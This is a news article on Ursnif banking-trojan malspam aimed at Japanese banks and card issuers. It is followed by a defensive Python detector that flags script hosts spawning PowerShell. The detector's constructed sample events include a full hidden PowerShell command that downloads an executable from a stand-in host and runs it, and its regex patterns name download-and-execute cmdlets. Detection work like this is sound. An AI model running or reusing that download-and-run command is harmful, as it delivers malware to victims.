Ursnif banking malware surges in Japan; banks and payment card companies hit

News by Bradley Barth

Malspam campaigns designed to spread the Ursnif banking trojan have been heavily targeting Japanese banks and payment card providers throughout 2017, and especially since September, according to IBM's X-Force research team.

The campaigns use Ursnif, also known as Gozi, to steal data from authenticated sessions, perform web injections and redirect victims to attacker-controlled pages, reports Limor Kessem, an IBM cyber-security expert, in a company blog post published on Thursday last week. Beyond online banking credentials, the malware's configuration also targets local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites, the report continues.

Because the targets in each successive wave have been the same, IBM posits that a single threat actor is behind all of the spam campaigns. Most of them infect victims through malicious attachments crafted to look like correspondence from Japanese financial services and payment card providers.

"In other malspam versions, users receive an HTML link that leads to an archive (.zip) file containing JavaScript, which launches a PowerShell script that fetches the payload from a remote server and infects the user with Ursnif," Kessem writes. "The payload appears to be served from web resources the attackers registered to serve the malicious code, not from hijacked domains."
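The delivery chain Kessem describes (an archived JavaScript file that launches PowerShell, which in turn fetches the payload) leaves a recognisable process-creation trail on the endpoint. The detector below is an added example written for this page, not code from IBM X-Force or from the article; it runs over constructed Sysmon-style process-creation events whose field names (pid, ppid, image, cmdline, user) and sample values are assumptions for illustration, not real telemetry. It flags a Windows script host (wscript.exe or cscript.exe) spawning PowerShell and records which additional indicators, such as download cmdlets, hidden/no-profile switches, or a script path under a temp directory, were present.

```python
# Added example (not from the IBM X-Force report or the article): a small
# detector for the JavaScript -> PowerShell -> remote payload delivery chain,
# run over CONSTRUCTED process-creation events in a Sysmon-like shape.
# Field names and sample values are assumptions for illustration only.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the newly created process
    cmdline: str    # its command line
    user: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments typical of a script that fetches and runs a remote payload.
DOWNLOAD_RE = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|"
    r"new-object\s+net\.webclient|\biex\b|invoke-expression)", re.I)
# Switches that hide the window, suppress the profile, or pass an encoded command.
OBFUSCATION_RE = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b)", re.I)
# A script launched from a temp directory is typical of an archive opened from e-mail.
TEMP_RE = re.compile(r"\\(temp|tmp|appdata\\local\\temp)\\", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_chain(events):
    """Return one finding per PowerShell process whose parent is a script host."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) not in POWERSHELL:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in SCRIPT_HOSTS:
            continue
        reasons = ["script host spawned PowerShell"]
        if DOWNLOAD_RE.search(e.cmdline):
            reasons.append("download/execute cmdlet in command line")
        if OBFUSCATION_RE.search(e.cmdline):
            reasons.append("hidden/encoded/no-profile switches")
        if TEMP_RE.search(parent.cmdline):
            reasons.append("script launched from a temp directory")
        findings.append({"pid": e.pid, "parent_pid": parent.pid,
                         "user": e.user, "reasons": reasons})
    return findings


# Constructed sample events: one malicious chain (pid 200 -> 300) and
# benign administrative activity that must not be flagged.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", "alice"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\invoice.zip\invoice.js"',
              "alice"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/p.exe','$env:TEMP\\p.exe');"
              " Start-Process $env:TEMP\\p.exe\"",
              "alice"),
    ProcEvent(400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File C:\\scripts\\backup.ps1", "bob"),
    ProcEvent(500, 100, r"C:\Windows\System32\cscript.exe",
              "cscript.exe C:\\scripts\\inventory.vbs", "bob"),
    ProcEvent(600, 500, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", "bob"),
]

if __name__ == "__main__":
    for finding in find_chain(SAMPLE_EVENTS):
        print(finding)
```

The parent-child relationship alone is a strong signal in most enterprise environments, since legitimate JScript or VBScript rarely needs to spawn PowerShell; the extra indicators are recorded separately so an analyst can tune severity rather than discard the alert when only the chain matches.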
